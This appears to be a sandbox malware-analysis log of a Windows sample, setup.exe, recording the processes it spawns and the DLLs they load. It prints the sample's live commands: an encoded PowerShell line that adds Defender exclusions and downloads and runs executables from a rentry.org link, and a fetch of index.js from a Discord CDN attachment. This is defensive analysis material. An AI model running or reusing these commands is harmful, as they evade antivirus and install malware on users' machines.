                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u1.exeProcess created: C:\Windows\SysWOW64\OpenWith.exe "C:\Windows\system32\openwith.exe"
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeProcess created: C:\Users\user\AppData\Local\Programs\Steam\Steam.exe "C:\Users\user\AppData\Local\Programs\Steam\Steam.exe"
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeProcess created: C:\Windows\System32\cscript.exe cscript.exe
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeProcess created: C:\Users\user\AppData\Local\Programs\Steam\Steam.exe "C:\Users\user\AppData\Local\Programs\Steam\Steam.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\Steam" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1696,i,16557963471468826308,12020294816136511924,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1684 /prefetch:2
                        Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeProcess created: C:\Windows\System32\cscript.exe cscript.exe //Nologo C:\Users\user\AppData\Local\Programs\Steam\resources\app.asar.unpacked\node_modules\regedit\vbs\regList.wsf A HKCU\Software\Valve\Steam
                        Source: C:\Windows\System32\cscript.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeProcess created: C:\Users\user\AppData\Local\Programs\Steam\Steam.exe "C:\Users\user\AppData\Local\Programs\Steam\Steam.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\Steam" --field-trial-handle=2456,i,16557963471468826308,12020294816136511924,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2356 /prefetch:3
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msiexec.exe msiexec /i nodejs-installer.msi /quiet
                        Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                        Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\System32\msiexec.exe C:\Windows\System32\MsiExec.exe -Embedding 933007F3F47C18EFDBF07080B43D7822
                        Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\System32\msiexec.exe C:\Windows\System32\MsiExec.exe -Embedding E900A4471D84F90E9185A9C7E4B35274 E Global\MSI0000
                        Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 3B1C8062EAD881799860A5FD745359D4
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://cdn.discordapp.com/attachments/1249192949389201463/1249192988895350794/index.js?ex=666da961&is=666c57e1&hm=18936ed8d9532b88193b485814d4fae2181305431d8e870870aab77fc153e162&' -OutFile 'C:\Users\user\AppData\Local\Temp\chrome2\index.js'"
                        Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A"Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exe "C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exe" Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\okdtlfsk.k4u1.exe "C:\Users\user\AppData\Roaming\okdtlfsk.k4u1.exe" Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exe "C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exe" Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exe "C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u1.exeProcess created: C:\Windows\SysWOW64\OpenWith.exe "C:\Windows\system32\openwith.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\2030.tmp\2031.tmp\2032.bat C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeProcess created: C:\Users\user\AppData\Local\Programs\Steam\Steam.exe "C:\Users\user\AppData\Local\Programs\Steam\Steam.exe"Jump to behavior
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\where.exe where node
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://nodejs.org/dist/v20.12.2/node-v20.12.2-x64.msi' -OutFile 'nodejs-installer.msi'"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msiexec.exe msiexec /i nodejs-installer.msi /quiet
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://cdn.discordapp.com/attachments/1249192949389201463/1249192988895350794/index.js?ex=666da961&is=666c57e1&hm=18936ed8d9532b88193b485814d4fae2181305431d8e870870aab77fc153e162&' -OutFile 'C:\Users\user\AppData\Local\Temp\chrome2\index.js'"
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeProcess created: C:\Users\user\AppData\Local\Programs\Steam\Steam.exe "C:\Users\user\AppData\Local\Programs\Steam\Steam.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\Steam" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1696,i,16557963471468826308,12020294816136511924,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=1684 /prefetch:2
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeProcess created: C:\Windows\System32\cscript.exe cscript.exe
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeProcess created: C:\Windows\System32\cscript.exe cscript.exe //Nologo C:\Users\user\AppData\Local\Programs\Steam\resources\app.asar.unpacked\node_modules\regedit\vbs\regList.wsf A HKCU\Software\Valve\Steam
                        Source: C:\Users\user\AppData\Local\Programs\Steam\Steam.exeProcess created: C:\Users\user\AppData\Local\Programs\Steam\Steam.exe "C:\Users\user\AppData\Local\Programs\Steam\Steam.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\Steam" --field-trial-handle=2456,i,16557963471468826308,12020294816136511924,262144 --enable-features=kWebSQLAccess --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2356 /prefetch:3
                        Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\System32\msiexec.exe C:\Windows\System32\MsiExec.exe -Embedding 933007F3F47C18EFDBF07080B43D7822
                        Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\System32\msiexec.exe C:\Windows\System32\MsiExec.exe -Embedding E900A4471D84F90E9185A9C7E4B35274 E Global\MSI0000
                        Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 3B1C8062EAD881799860A5FD745359D4
                        Source: C:\Users\user\Desktop\setup.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\setup.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\setup.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\setup.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\setup.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\setup.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\setup.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\setup.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\setup.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\setup.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\setup.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\Desktop\setup.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\setup.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\Desktop\setup.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\Desktop\setup.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\Desktop\setup.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\Desktop\setup.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\Desktop\setup.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\Desktop\setup.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\setup.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\Desktop\setup.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\Desktop\setup.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\Desktop\setup.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\Desktop\setup.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\setup.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\Desktop\setup.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\Desktop\setup.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeSection loaded: dwrite.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u0.exeSection loaded: textshaping.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u1.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u1.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exeSection loaded: pcacli.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u2.exeSection loaded: sfc_os.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeSection loaded: dwmapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeSection loaded: oleacc.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeSection loaded: shfolder.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeSection loaded: iconcodecservice.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeSection loaded: ntshrui.dllJump to behavior
                        Source: C:\Users\user\AppData\Roaming\okdtlfsk.k4u3.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
